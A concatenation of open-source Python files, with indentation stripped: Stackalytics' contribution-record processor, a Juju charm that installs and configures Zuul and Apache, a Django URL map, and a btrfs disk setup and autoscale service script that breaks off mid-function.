# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bisect
import collections
import copy
import functools
import time
from oslo_config import cfg
from oslo_log import log as logging
import six
from stackalytics.processor import launchpad_utils
from stackalytics.processor import user_processor
from stackalytics.processor import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RecordProcessor(object):
def __init__(self, runtime_storage_inst):
self.runtime_storage_inst = runtime_storage_inst
self.domains_index = runtime_storage_inst.get_by_key('companies')
self.releases = runtime_storage_inst.get_by_key('releases')
self.releases_dates = [r['end_date'] for r in self.releases]
self.modules = None
self.alias_module_map = None
def _get_release(self, timestamp):
release_index = bisect.bisect(self.releases_dates, timestamp)
if release_index >= len(self.releases):
LOG.warning('Timestamp %s is beyond releases boundaries, the last '
'release will be used. Please consider adding a '
'new release into default_data.json', timestamp)
release_index = len(self.releases) - 1
return self.releases[release_index]['release_name']
def _get_modules(self):
if self.modules is None:
self.modules = set()
self.alias_module_map = dict()
for repo in utils.load_repos(self.runtime_storage_inst):
module = repo['module'].lower()
module_aliases = repo.get('aliases') or []
add = True
for module_name in ([module] + module_aliases):
for m in self.modules:
if module_name.find(m) >= 0:
add = False
break
if m.find(module_name) >= 0:
self.modules.remove(m)
break
if add:
self.modules.add(module_name)
for alias in module_aliases:
self.alias_module_map[alias] = module
return self.modules, self.alias_module_map
def _need_to_fetch_launchpad(self):
return CONF.fetching_user_source == 'launchpad'
def _update_user(self, record):
email = record.get('author_email')
user_e = user_processor.load_user(
self.runtime_storage_inst, email=email) or {}
user_name = record.get('author_name')
launchpad_id = record.get('launchpad_id')
if (self._need_to_fetch_launchpad() and email and (not user_e) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
launchpad_id, lp_user_name = launchpad_utils.query_lp_info(email)
if lp_user_name:
user_name = lp_user_name
gerrit_id = record.get('gerrit_id')
if gerrit_id:
user_g = user_processor.load_user(
self.runtime_storage_inst, gerrit_id=gerrit_id) or {}
if (self._need_to_fetch_launchpad() and (not user_g) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
guessed_lp_id = gerrit_id
lp_user_name = launchpad_utils.query_lp_user_name(
guessed_lp_id)
if lp_user_name == user_name:
launchpad_id = guessed_lp_id
else:
user_g = {}
zanata_id = record.get('zanata_id')
if zanata_id:
user_z = user_processor.load_user(
self.runtime_storage_inst, zanata_id=zanata_id) or {}
if (self._need_to_fetch_launchpad() and (not user_z) and
(not launchpad_id) and (not user_e.get('launchpad_id'))):
# query LP
guessed_lp_id = zanata_id
user_name = launchpad_utils.query_lp_user_name(guessed_lp_id)
if user_name != guessed_lp_id:
launchpad_id = guessed_lp_id
else:
user_z = {}
user_l = user_processor.load_user(
self.runtime_storage_inst, launchpad_id=launchpad_id) or {}
if user_processor.are_users_same([user_e, user_l, user_g, user_z]):
# If sequence numbers are set and the same, merge is not needed
return user_e
user = user_processor.create_user(
self.domains_index, launchpad_id, email, gerrit_id, zanata_id,
user_name)
if user_e or user_l or user_g or user_z:
# merge between existing profiles and a new one
user, users_to_delete = user_processor.merge_user_profiles(
self.domains_index, [user_e, user_l, user_g, user_z, user])
# delete all unneeded profiles
user_processor.delete_users(
self.runtime_storage_inst, users_to_delete)
else:
# create new profile
if (self._need_to_fetch_launchpad() and not user_name):
user_name = launchpad_utils.query_lp_user_name(launchpad_id)
if user_name:
user['user_name'] = user_name
LOG.debug('Created new user: %s', user)
user_processor.store_user(self.runtime_storage_inst, user)
LOG.debug('Stored user: %s', user)
return user
def _update_record_and_user(self, record):
user = self._update_user(record)
record['user_id'] = user['user_id']
if user.get('user_name'):
record['author_name'] = user['user_name']
company, policy = user_processor.get_company_for_date(
user['companies'], record['date'])
if not user.get('static'):
# for auto-generated profiles affiliation may be overridden
if company != '*robots' and policy == 'open':
company = (user_processor.get_company_by_email(
self.domains_index, record.get('author_email')) or company)
record['company_name'] = company
def _process_commit(self, record):
record['primary_key'] = record['commit_id']
record['loc'] = record['lines_added'] + record['lines_deleted']
record['author_email'] = record['author_email'].lower()
record['commit_date'] = record['date']
coauthors = record.get('coauthor')
if not coauthors:
self._update_record_and_user(record)
if record['company_name'] != '*robots':
yield record
else:
if record['author_email'] not in [
c['author_email'] for c in coauthors]:
coauthors.append({'author_name': record['author_name'],
'author_email': record['author_email']})
for coauthor in coauthors:
coauthor['date'] = record['date']
self._update_record_and_user(coauthor)
for coauthor in coauthors:
new_record = copy.deepcopy(record)
new_record.update(coauthor)
new_record['primary_key'] += coauthor['author_email']
yield new_record
def _make_review_record(self, record):
# copy everything except patchsets and flatten user data
review = dict([(k, v) for k, v in six.iteritems(record)
if k not in ['patchSets', 'owner', 'createdOn',
'comments']])
owner = record['owner']
review['primary_key'] = review['id']
if owner.get('username'):
review['gerrit_id'] = owner['username']
review['author_name'] = (owner.get('name') or owner.get('username')
or 'Anonymous Coward') # do it like gerrit
if owner.get('email'):
review['author_email'] = owner['email'].lower()
review['date'] = record['createdOn']
patch_sets = record.get('patchSets', [])
review['updated_on'] = review['date']
if patch_sets:
patch = patch_sets[-1]
if 'approvals' in patch:
review['value'] = min([int(p['value'])
for p in patch['approvals']])
review['updated_on'] = patch['approvals'][0]['grantedOn']
else:
review['updated_on'] = patch['createdOn']
if 'value' not in review:
review['value'] = 0
self._update_record_and_user(review)
return review
def _make_patch_record(self, review, patch):
patch_record = dict()
patch_record['record_type'] = 'patch'
patch_record['primary_key'] = utils.get_patch_id(
review['id'], patch['number'])
patch_record['number'] = patch['number']
patch_record['date'] = patch['createdOn']
uploader = patch['uploader']
if uploader.get('username'):
patch_record['gerrit_id'] = uploader['username']
patch_record['author_name'] = (uploader.get('name')
or uploader.get('username')
or 'Anonymous Coward')
if uploader.get('email'):
patch_record['author_email'] = uploader['email'].lower()
patch_record['module'] = review['module']
patch_record['branch'] = review['branch']
patch_record['review_id'] = review['id']
self._update_record_and_user(patch_record)
return patch_record
def _make_mark_record(self, review, patch, approval):
# copy everything and flatten user data
mark = dict([(k, v) for k, v in six.iteritems(approval)
if k not in ['by', 'grantedOn', 'value', 'description']])
reviewer = approval['by']
mark['record_type'] = 'mark'
mark['value'] = int(approval['value'])
mark['date'] = approval['grantedOn']
mark['primary_key'] = (review['id'] + str(mark['date']) + mark['type'])
mark['gerrit_id'] = reviewer['username']
mark['author_name'] = reviewer.get('name') or reviewer.get('username')
mark['author_email'] = reviewer['email'].lower()
mark['module'] = review['module']
mark['branch'] = review['branch']
mark['review_id'] = review['id']
mark['patch'] = int(patch['number'])
if reviewer['username'] == patch['uploader'].get('username'):
# reviewer is the same as author of the patch
mark['type'] = 'Self-%s' % mark['type']
self._update_record_and_user(mark)
return mark
def _process_review(self, record):
"""Process a review.
Review spawns into records of three types:
* review - records that a user created review request
* patch - records that a user submitted another patch set
* mark - records that a user set approval mark to given review
"""
owner = record['owner']
if 'email' in owner or 'username' in owner:
yield self._make_review_record(record)
for patch in record.get('patchSets', []):
if (('email' in patch['uploader']) or
('username' in patch['uploader'])):
yield self._make_patch_record(record, patch)
if 'approvals' not in patch:
continue # not reviewed by anyone
for approval in patch['approvals']:
if approval['type'] not in ('Code-Review', 'Workflow'):
continue # keep only Code-Review and Workflow
if ('email' not in approval['by'] or
'username' not in approval['by']):
continue # ignore
yield self._make_mark_record(record, patch, approval)
# check for abandon action
if record.get('status') == 'ABANDONED':
for comment in reversed(record.get('comments') or []):
if comment['message'] == 'Abandoned':
action = dict(type='Abandon', value=0)
action['by'] = comment['reviewer']
action['grantedOn'] = comment['timestamp']
if ('email' not in action['by'] or
'username' not in action['by']):
continue # ignore
yield self._make_mark_record(
record, record['patchSets'][-1], action)
def _guess_module(self, record):
subject = record['subject'].lower()
pos = len(subject)
best_guess_module = None
modules, alias_module_map = self._get_modules()
for module in modules:
find = subject.find(module)
if (find >= 0) and (find < pos):
pos = find
best_guess_module = module
if best_guess_module:
if (((pos > 0) and (subject[pos - 1] == '[')) or
(not record.get('module'))):
record['module'] = best_guess_module
if not record.get('module'):
record['module'] = 'unknown'
elif record['module'] in alias_module_map:
record['module'] = alias_module_map[record['module']]
def _process_email(self, record):
record['primary_key'] = record['message_id']
record['author_email'] = record['author_email'].lower()
self._update_record_and_user(record)
self._guess_module(record)
if not record.get('blueprint_id'):
del record['body']
elif len(record['body']) > 4000:
record['body'] = record['body'][:4000] + '...'
yield record
def _process_blueprint(self, record):
bpd_author = record.get('drafter') or record.get('owner')
bpd = dict([(k, v) for k, v in six.iteritems(record)
if k.find('_link') < 0])
bpd['record_type'] = 'bpd'
bpd['primary_key'] = 'bpd:' + record['id']
bpd['launchpad_id'] = bpd_author
bpd['date'] = record['date_created']
bpd['web_link'] = record.get('web_link')
self._update_record_and_user(bpd)
yield bpd
if (record.get('assignee') and record['date_completed'] and
record.get('implementation_status') == 'Implemented'):
bpc = dict([(k, v) for k, v in six.iteritems(record)
if k.find('_link') < 0])
bpc['record_type'] = 'bpc'
bpc['primary_key'] = 'bpc:' + record['id']
bpc['launchpad_id'] = record['assignee']
bpc['date'] = record['date_completed']
self._update_record_and_user(bpc)
yield bpc
def _process_bug(self, record):
bug_created = record.copy()
bug_created['primary_key'] = 'bugf:' + record['id']
bug_created['record_type'] = 'bugf'
bug_created['launchpad_id'] = record.get('owner')
bug_created['date'] = record['date_created']
self._update_record_and_user(bug_created)
yield bug_created
FIXED_BUGS = ['Fix Committed', 'Fix Released']
if (('date_fix_committed' in record or 'date_fix_released' in record)
and record['status'] in FIXED_BUGS):
bug_fixed = record.copy()
bug_fixed['primary_key'] = 'bugr:' + record['id']
bug_fixed['record_type'] = 'bugr'
bug_fixed['launchpad_id'] = record.get('assignee') or '*unassigned'
# It appears that launchpad automatically sets the
# date_fix_committed field when a bug moves from an open
# state to Fix Released, however it isn't clear that this
# is documented. So, we take the commit date if it is
# present or the release date if no commit date is
# present.
bug_fixed['date'] = (
record.get('date_fix_committed') or
record['date_fix_released']
)
self._update_record_and_user(bug_fixed)
yield bug_fixed
def _process_member(self, record):
user_id = user_processor.make_user_id(member_id=record['member_id'])
record['primary_key'] = user_id
record['date'] = utils.member_date_to_timestamp(record['date_joined'])
record['author_name'] = record['member_name']
record['module'] = 'unknown'
company_draft = record['company_draft']
company_name = self.domains_index.get(utils.normalize_company_name(
company_draft)) or (utils.normalize_company_draft(company_draft))
# author_email is a key to create new user
record['author_email'] = user_id
record['company_name'] = company_name
# _update_record_and_user function will create new user if needed
self._update_record_and_user(record)
record['company_name'] = company_name
user = user_processor.load_user(self.runtime_storage_inst,
user_id=user_id)
user['user_name'] = record['author_name']
user['companies'] = [{
'company_name': company_name,
'end_date': 0,
}]
user['company_name'] = company_name
user_processor.store_user(self.runtime_storage_inst, user)
record['company_name'] = company_name
yield record
def _process_translation(self, record):
# todo split translation and approval
translation = record.copy()
user_id = user_processor.make_user_id(zanata_id=record['zanata_id'])
translation['record_type'] = 'tr'
translation['primary_key'] = '%s:%s:%s:%s' % (
user_id, record['module'], record['date'], record['branch'])
translation['author_name'] = user_id
# following fields are put into standard fields stored in dashboard mem
translation['loc'] = record['translated']
translation['value'] = record['language']
self._update_record_and_user(translation)
yield translation
def _renew_record_date(self, record):
record['week'] = utils.timestamp_to_week(record['date'])
if ('release' not in record) or (not record['release']):
record['release'] = self._get_release(record['date'])
def process(self, record_iterator):
PROCESSORS = {
'commit': self._process_commit,
'review': self._process_review,
'email': self._process_email,
'bp': self._process_blueprint,
'bug': self._process_bug,
'member': self._process_member,
'i18n': self._process_translation,
}
for record in record_iterator:
for r in PROCESSORS[record['record_type']](record):
self._renew_record_date(r)
yield r
def _update_records_with_releases(self, release_index):
LOG.info('Update records with releases')
def record_handler(record):
if (record['record_type'] == 'commit'
and record['primary_key'] in release_index):
release = release_index[record['primary_key']]
else:
release = self._get_release(record['date'])
if record['release'] != release:
record['release'] = release
yield record
yield record_handler
def _update_records_with_user_info(self):
LOG.info('Update user info in records')
def record_handler(record):
company_name = record['company_name']
user_id = record['user_id']
author_name = record['author_name']
self._update_record_and_user(record)
if ((record['company_name'] != company_name) or
(record['user_id'] != user_id) or
(record['author_name'] != author_name)):
LOG.debug('User info (%(id)s, %(name)s, %(company)s) has '
'changed in record %(record)s',
{'id': user_id, 'name': author_name,
'company': company_name, 'record': record})
yield record
yield record_handler
def _update_commits_with_merge_date(self):
LOG.info('Update commits with merge date')
change_id_to_date = {}
def record_handler_pass_1(record):
if (record['record_type'] == 'review' and
record.get('status') == 'MERGED'):
change_id_to_date[record['id']] = record['lastUpdated']
yield record_handler_pass_1
LOG.info('Update commits with merge date: pass 2')
def record_handler_pass_2(record):
if record['record_type'] == 'commit':
change_id_list = record.get('change_id')
if change_id_list and len(change_id_list) == 1:
change_id = change_id_list[0]
if change_id in change_id_to_date:
old_date = record['date']
if old_date != change_id_to_date[change_id]:
record['date'] = change_id_to_date[change_id]
self._renew_record_date(record)
LOG.debug('Date %(date)s has changed in record '
'%(record)s', {'date': old_date,
'record': record})
yield record
yield record_handler_pass_2
def _update_blueprints_with_mention_info(self):
LOG.info('Process blueprints and calculate mention info')
valid_blueprints = {}
mentioned_blueprints = {}
def record_handler_pass_1(record):
for bp in record.get('blueprint_id', []):
if bp in mentioned_blueprints:
mentioned_blueprints[bp]['count'] += 1
if record['date'] > mentioned_blueprints[bp]['date']:
mentioned_blueprints[bp]['date'] = record['date']
else:
mentioned_blueprints[bp] = {
'count': 1,
'date': record['date']
}
if record['record_type'] in ['bpd', 'bpc']:
valid_blueprints[record['id']] = {
'primary_key': record['primary_key'],
'count': 0,
'date': record['date']
}
yield record_handler_pass_1
for bp_name, bp in six.iteritems(valid_blueprints):
if bp_name in mentioned_blueprints:
bp['count'] = mentioned_blueprints[bp_name]['count']
bp['date'] = mentioned_blueprints[bp_name]['date']
else:
bp['count'] = 0
bp['date'] = 0
LOG.info('Process blueprints and calculate mention info: pass 2')
def record_handler_pass_2(record):
need_update = False
valid_bp = set([])
for bp in record.get('blueprint_id', []):
if bp in valid_blueprints:
valid_bp.add(bp)
else:
LOG.debug('Update record %s: removed invalid bp: %s',
record['primary_key'], bp)
need_update = True
record['blueprint_id'] = list(valid_bp)
if record['record_type'] in ['bpd', 'bpc']:
bp = valid_blueprints[record['id']]
if ((record.get('mention_count') != bp['count']) or
(record.get('mention_date') != bp['date'])):
record['mention_count'] = bp['count']
record['mention_date'] = bp['date']
LOG.debug('Update record %s: mention stats: (%s:%s)',
record['primary_key'], bp['count'], bp['date'])
need_update = True
if need_update:
yield record
yield record_handler_pass_2
def _determine_core_contributors(self):
LOG.info('Determine core contributors')
module_branches = collections.defaultdict(set)
quarter_ago = int(time.time()) - 60 * 60 * 24 * 30 * 3 # a quarter ago
def record_handler(record):
if (record['record_type'] == 'mark' and
record['date'] > quarter_ago and
record['value'] in [2, -2]):
module_branch = (record['module'], record['branch'])
user_id = record['user_id']
module_branches[user_id].add(module_branch)
yield record_handler
for user in self.runtime_storage_inst.get_all_users():
core_old = user.get('core')
user_module_branch = module_branches.get(user['user_id'])
if user_module_branch:
user['core'] = list(user_module_branch)
elif user.get('core'):
del user['core']
if user.get('core') != core_old:
user_processor.store_user(self.runtime_storage_inst, user)
def _close_patch(self, cores, marks):
if len(marks) < 2:
return
core_mark = 0
for mark in sorted(marks, key=lambda x: x['date'], reverse=True):
if core_mark == 0:
if (mark['module'], mark['branch'], mark['user_id']) in cores:
# mark is from core engineer
core_mark = mark['value']
continue
disagreement = ((core_mark != 0) and
((core_mark < 0 < mark['value']) or
(core_mark > 0 > mark['value'])))
old_disagreement = mark.get('disagreement', False)
mark['disagreement'] = disagreement
if old_disagreement != disagreement:
yield mark
def _update_marks_with_disagreement(self):
LOG.info('Process marks to find disagreements')
cores = set()
for user in self.runtime_storage_inst.get_all_users():
for (module, branch) in (user.get('core') or []):
cores.add((module, branch, user['user_id']))
# map from review_id to current patch and list of marks
marks_per_patch = collections.defaultdict(
lambda: {'patch_number': 0, 'marks': []})
def record_handler(record):
if (record['record_type'] == 'mark' and
record['type'] == 'Code-Review'):
review_id = record['review_id']
patch_number = record['patch']
if review_id in marks_per_patch:
# review is already seen, check if patch is newer
if (marks_per_patch[review_id]['patch_number'] <
patch_number):
# the patch is new, close the current
for processed in self._close_patch(
cores, marks_per_patch[review_id]['marks']):
yield processed
del marks_per_patch[review_id]
marks_per_patch[review_id]['patch_number'] = patch_number
marks_per_patch[review_id]['marks'].append(record)
yield record_handler
# purge the rest
for marks_patch in marks_per_patch.values():
self.runtime_storage_inst.set_records(
self._close_patch(cores, marks_patch['marks']))
def _update_members_company_name(self):
LOG.info('Update members with company names')
def record_handler(record):
if record['record_type'] != 'member':
return
company_draft = record['company_draft']
company_name = self.domains_index.get(
utils.normalize_company_name(company_draft)) or (
utils.normalize_company_draft(company_draft))
if company_name == record['company_name']:
return
LOG.debug('Update record %s, company name changed to %s',
record, company_name)
record['company_name'] = company_name
yield record
user = user_processor.load_user(self.runtime_storage_inst,
user_id=record['user_id'])
LOG.debug('Update user %s, company name changed to %s',
user, company_name)
user['companies'] = [{
'company_name': company_name,
'end_date': 0,
}]
user_processor.store_user(self.runtime_storage_inst, user)
yield record_handler
def _update_commits_with_module_alias(self):
LOG.info('Update record with aliases')
modules, alias_module_map = self._get_modules()
def record_handler(record):
if record['record_type'] != 'commit':
return
rec_module = record.get('module', None)
if rec_module and rec_module in alias_module_map:
record['module'] = alias_module_map[rec_module]
yield record
yield record_handler
def post_processing(self, release_index):
processors = [
self._update_records_with_user_info,
self._update_commits_with_merge_date,
functools.partial(self._update_records_with_releases,
release_index),
self._update_commits_with_module_alias,
self._update_blueprints_with_mention_info,
self._determine_core_contributors,
self._update_members_company_name,
self._update_marks_with_disagreement,
]
pipeline_processor = utils.make_pipeline_processor(processors)
self.runtime_storage_inst.set_records(pipeline_processor(
self.runtime_storage_inst.get_all_records))
| 0xf2/stackalytics | stackalytics/processor/record_processor.py | Python | apache-2.0 | 30,623 |
import ConfigParser
import os
import pwd
import shutil
import sys
import subprocess
import tempfile
sys.path.insert(0, os.path.join(os.environ['CHARM_DIR'], 'lib'))
from charmhelpers.core.hookenv import charm_dir, config, log, relation_set, open_port, close_port
from charmhelpers.core.templating import render
from charmhelpers.fetch import giturl, apt_install, apt_update, archiveurl
from charmhelpers.core.host import service_restart, service_start, service_stop
PACKAGES = [ 'git', 'python-setuptools', 'python-dev', 'python-pip', 'apache2' ]
ZUUL_GIT_URL = 'https://github.com/openstack-infra/zuul.git'
ZUUL_USER = 'zuul'
ZUUL_CONF_DIR = '/etc/zuul'
ZUUL_SSH_DIR = '/home/zuul/.ssh'
ZUUL_SSH_PRIVATE_FILE = 'id_rsa'
ZUUL_RUN_DIR = '/var/run/zuul'
ZUUL_MERGER_RUN_DIR = '/var/run/zuul-merger'
ZUUL_STATE_DIR = '/var/lib/zuul'
ZUUL_GIT_DIR = '/var/lib/zuul/git'
ZUUL_LOG_DIR = '/var/log/zuul'
APACHE2_CONF_DIR = '/etc/apache2'
GEAR_GIT_URL = 'https://github.com/openstack-infra/gear.git'
GEAR_STABLE_TAG = '0.7.0'
OPENSTACK_FUNCTIONS_URL = 'https://raw.githubusercontent.com/' \
'openstack-infra/project-config/master/zuul/openstack_functions.py'
def render_logging_conf():
logging_conf = os.path.join(ZUUL_CONF_DIR, 'logging.conf')
context = { 'zuul_log': os.path.join(ZUUL_LOG_DIR, 'zuul.log') }
render('logging.conf', logging_conf, context, ZUUL_USER, ZUUL_USER)
def render_gearman_logging_conf():
gearman_logging_conf = os.path.join(ZUUL_CONF_DIR, 'gearman-logging.conf')
context = {
'gearman_log': os.path.join(ZUUL_LOG_DIR, 'gearman-server.log')
}
render('gearman-logging.conf', gearman_logging_conf, context, ZUUL_USER,
ZUUL_USER)
def render_zuul_conf():
gearman_start = "false"
if is_service_enabled("gearman"):
gearman_start = "true"
context = {
'gearman_host': config('gearman-server'),
'gearman_port': config('gearman-port'),
'gearman_internal': gearman_start,
'gearman_log': os.path.join(ZUUL_CONF_DIR, 'gearman-logging.conf'),
'gerrit_server': config('gerrit-server'),
'gerrit_port': '29418',
'gerrit_username': config('username'),
'gerrit_sshkey': os.path.join(ZUUL_SSH_DIR, ZUUL_SSH_PRIVATE_FILE),
'zuul_layout': os.path.join(ZUUL_CONF_DIR, 'layout.yaml'),
'zuul_logging': os.path.join(ZUUL_CONF_DIR, 'logging.conf'),
'zuul_pidfile': os.path.join(ZUUL_RUN_DIR, 'zuul.pid'),
'zuul_state_dir': ZUUL_STATE_DIR,
'zuul_status_url': config('status-url'),
'zuul_git_dir': ZUUL_GIT_DIR,
'zuul_url': config('zuul-url'),
'zuul_smtp_server': config('zuul-smtp-server'),
'zuul_smtp_from': config('zuul-smtp-from'),
'zuul_smtp_to': config('zuul-smtp-to'),
'merger_git_user_email': config('git-user-email'),
'merger_git_user_name': config('git-user-name'),
'merger_pidfile': os.path.join(ZUUL_MERGER_RUN_DIR, 'merger.pid')
}
zuul_conf = os.path.join(ZUUL_CONF_DIR, 'zuul.conf')
render('zuul.conf', zuul_conf, context, ZUUL_USER, ZUUL_USER)
def render_layout():
if is_service_enabled("server"):
layout_template = 'layout_standard.yaml'
elif is_service_enabled("gearman"):
layout_template = 'layout_gearman.yaml'
else:
layout_template = ''
if layout_template:
layout_conf = os.path.join(ZUUL_CONF_DIR, 'layout.yaml')
render(layout_template, layout_conf, { }, ZUUL_USER, ZUUL_USER)
def render_zuul_vhost_conf():
context = {
'git_dir': ZUUL_GIT_DIR
}
zuul_vhost = os.path.join(APACHE2_CONF_DIR, 'sites-available/zuul.conf')
render('apache2-vhost.conf', zuul_vhost, context, perms=0o644)
def download_openstack_functions():
url_handler = archiveurl.ArchiveUrlFetchHandler()
openstack_functions_path = os.path.join(ZUUL_CONF_DIR,
'openstack_functions.py')
url_handler.download(OPENSTACK_FUNCTIONS_URL, openstack_functions_path)
zuul_user = pwd.getpwnam(ZUUL_USER)
os.chown(openstack_functions_path, zuul_user.pw_uid, zuul_user.pw_gid)
os.chmod(openstack_functions_path, 0644)
def create_zuul_upstart_services():
zuul_server = '/etc/init/zuul-server.conf'
zuul_merger = '/etc/init/zuul-merger.conf'
zuul_server_bin = '/usr/local/bin/zuul-server'
zuul_merger_bin = '/usr/local/bin/zuul-merger'
zuul_conf = os.path.join(ZUUL_CONF_DIR, 'zuul.conf')
context = {
'zuul_server_bin': zuul_server_bin,
'zuul_conf': zuul_conf,
'zuul_user': ZUUL_USER
}
if is_service_enabled("server") or is_service_enabled("gearman"):
render('upstart/zuul-server.conf', zuul_server, context, perms=0o644)
context.pop('zuul_server_bin')
if is_service_enabled("merger"):
context.update({'zuul_merger_bin': zuul_merger_bin})
render('upstart/zuul-merger.conf', zuul_merger, context, perms=0o644)
def install_from_git(repository_url, tag):
current_dir = os.getcwd()
temp_dir = tempfile.mkdtemp()
git_handler = giturl.GitUrlFetchHandler()
git_handler.clone(repository_url, temp_dir, 'master')
os.chdir(temp_dir)
subprocess.check_call(['git', 'checkout', 'tags/{0}'.format(tag)])
subprocess.check_call(['pip', 'install', '-r', './requirements.txt'])
subprocess.check_call(['python', './setup.py', 'install'])
os.chdir(current_dir)
shutil.rmtree(temp_dir)
def generate_zuul_ssh_key():
zuul_user = pwd.getpwnam(ZUUL_USER)
ssh_key = os.path.join(ZUUL_SSH_DIR, ZUUL_SSH_PRIVATE_FILE)
with open(ssh_key, 'w') as f:
f.write(config('ssh-key'))
os.chown(ssh_key, zuul_user.pw_uid, zuul_user.pw_gid)
os.chmod(ssh_key, 0600)
def update_zuul_conf():
configs = config()
services_restart = False
if configs.changed('ssh-key'):
generate_zuul_ssh_key()
configs_keys = ['gearman-port', 'gerrit-server', 'username', 'zuul-url',
'status-url', 'git-user-name', 'git-user-email',
'services', 'gearman-server' ]
for key in configs_keys:
if configs.changed(key):
services_restart = True
break
if not services_restart:
log("Zuul config values didn't change.")
return False
configs.save()
render_zuul_conf()
return services_restart
def configure_apache2():
render_zuul_vhost_conf()
# required apache2 modules
subprocess.check_call(["a2enmod", "cgi"])
subprocess.check_call(["a2enmod", "rewrite"])
# disable default website
subprocess.check_call(["a2dissite", "000-default"])
# enable zuul website
subprocess.check_call(["a2ensite", 'zuul'])
service_restart('apache2')
# HOOKS METHODS
def install():
subprocess.check_call(['apt-get', 'install', '-y'] + PACKAGES)
install_from_git(ZUUL_GIT_URL, config('version'))
install_from_git(GEAR_GIT_URL, GEAR_STABLE_TAG)
try:
pwd.getpwnam(ZUUL_USER)
except KeyError:
# create Zuul user
subprocess.check_call(["useradd", "--create-home", ZUUL_USER])
directories = [ ZUUL_CONF_DIR, ZUUL_SSH_DIR, ZUUL_RUN_DIR, ZUUL_STATE_DIR,
ZUUL_GIT_DIR, ZUUL_LOG_DIR, ZUUL_MERGER_RUN_DIR ]
zuul_user = pwd.getpwnam(ZUUL_USER)
for directory in directories:
if not os.path.exists(directory):
os.mkdir(directory)
os.chmod(directory, 0755)
os.chown(directory, zuul_user.pw_uid, zuul_user.pw_gid)
generate_zuul_ssh_key()
# generate configuration files
render_logging_conf()
render_gearman_logging_conf()
render_layout()
render_zuul_conf()
create_zuul_upstart_services()
download_openstack_functions()
configure_apache2()
def is_service_enabled(service):
return service in [i.strip() for i in config('services').split(',')]
def config_changed():
if update_zuul_conf():
# zuul.conf was updated and Zuul services must be restarted
if is_service_enabled("server") or is_service_enabled("gearman"):
service_restart('zuul-server')
if is_service_enabled("merger"):
service_restart('zuul-merger')
log('Zuul services restarted')
def start():
if is_service_enabled("server") or is_service_enabled("gearman"):
service_start('zuul-server')
if is_service_enabled("merger"):
service_start('zuul-merger')
log('Zuul services started.')
def stop():
if is_service_enabled("server") or is_service_enabled("gearman"):
service_stop('zuul-server')
if is_service_enabled("merger"):
service_stop('zuul-merger')
log('Zuul services stopped.')
def zuul_relation_changed():
gearman_port = config('gearman-port')
relation_set(gearman_ip=unit_get('public-address'),
gearman_port=gearman_port)
open_port(gearman_port)
def zuul_relation_broken():
close_port(config('gearman-port'))
| cloudbase/zuul-charm | hooks/hooks.py | Python | apache-2.0 | 9,009 |
from django.conf.urls import patterns, url
from api.views import query
from api.views import search
from api.views import submit
urlpatterns = patterns('',
url(r'^food/$', query.food_handler, name='food'),
url(r'^categories/all/$', query.category_all_handler, name='category'),
url(r'^categories/all/detailed/$', query.category_all_detailed_handler, name='category_detailed'),
url(r'^search/food/$', search.search_food_handler, name='search_food'),
url(r'^submit/$', submit.submit_handler, name='submit')
#url(r'^search/suggestion/$', search.search_suggestion_handler, name='search_suggestion')
)
| czgu/opendataexperience | server/api/urls.py | Python | apache-2.0 | 625 |
def init_actions_(service, args):
"""
this needs to returns an array of actions representing the depencies between actions.
Looks at ACTION_DEPS in this module for an example of what is expected
"""
# some default logic for simple actions
return {
'autoscale': ['install']
}
def install(job):
service = job.service
# List available devices
code, out, err = service.executor.cuisine.core.run('lsblk -J -o NAME,FSTYPE,MOUNTPOINT')
if code != 0:
raise RuntimeError('failed to list bulk devices: %s' % err)
disks = j.data.serializer.json.loads(out)
btrfs_devices = []
for device in disks['blockdevices']:
if not device['name'].startswith('vd') or device['name'] == 'vda':
continue
btrfs_devices.append(device)
btrfs_devices.sort(key=lambda e: e['name'])
if len(btrfs_devices) == 0:
raise RuntimeError('no data disks on machine')
master = btrfs_devices[0]
if master['fstype'] != 'btrfs':
# creating the filesystem on all of the devices.
cmd = 'mkfs.btrfs -f %s' % ' '.join(map(lambda e: '/dev/%s' % e['name'], btrfs_devices))
code, out, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to create filesystem: %s' % err)
if master['mountpoint'] is None:
service.executor.cuisine.core.dir_ensure(service.model.data.mount)
cmd = 'mount /dev/%s %s' % (master['name'], service.model.data.mount)
code, out, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to mount device: %s' % err)
# Last thing is to check that all devices are part of the filesystem
# in case we support hot plugging of disks in the future.
code, out, err = service.executor.cuisine.core.run('btrfs filesystem show /dev/%s' % master['name'])
if code != 0:
raise RuntimeError('failed to inspect filesystem on device: %s' % err)
# parse output.
import re
fs_devices = re.findall('devid\s+.+\s/dev/(.+)$', out, re.MULTILINE)
for device in btrfs_devices:
if device['name'] not in fs_devices:
# add device to filesystem
cmd = 'btrfs device add -f /dev/%s %s' % (device['name'], service.model.data.mount)
code, _, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to add device %s to fs: %s' % (
device['name'],
err)
)
def autoscale(job):
service = job.service
repo = service.aysrepo
exc = service.executor
cuisine = exc.cuisine
code, out, err = cuisine.core.run('btrfs filesystem usage -b {}'.format(service.model.data.mount), die=False)
if code != 0:
raise RuntimeError('failed to get device usage: %s', err)
# get free space.
import re
match = re.search('Free[^:]*:\s+(\d+)', out)
if match is None:
raise RuntimeError('failed to get free space')
free = int(match.group(1)) / (1024 * 1024) # MB.
node = None
for parent in service.parents:
if parent.model.role == 'node':
node = parent
break
if node is None:
raise RuntimeError('failed to find the parent node')
# DEBUG, set free to 0
current_disks = list(node.model.data.disk)
if free < service.model.data.threshold:
# add new disk to the array.
args = {
'size': service.model.data.incrementSize,
'prefix': 'autoscale',
}
adddiskjob = node.getJob('add_disk')
adddiskjob.model.args = args
adddiskjob.executeInProcess()
node = repo.serviceGet(node.model.role, node.name)
new_disks = list(node.model.data.disk)
added = set(new_disks).difference(current_disks)
# if len(added) != 1:
# raise RuntimeError('failed to find the new added disk (disks found %d)', len(added))
#TODO: add device to volume
# get the disk object.
if added:
disk_name = added.pop()
disk = None
os_svc = service.producers['os'][0]
nod = os_svc.producers['node'][0]
for dsk in nod.producers.get('disk', []):
if dsk.model.dbobj.name == disk_name:
disk = dsk
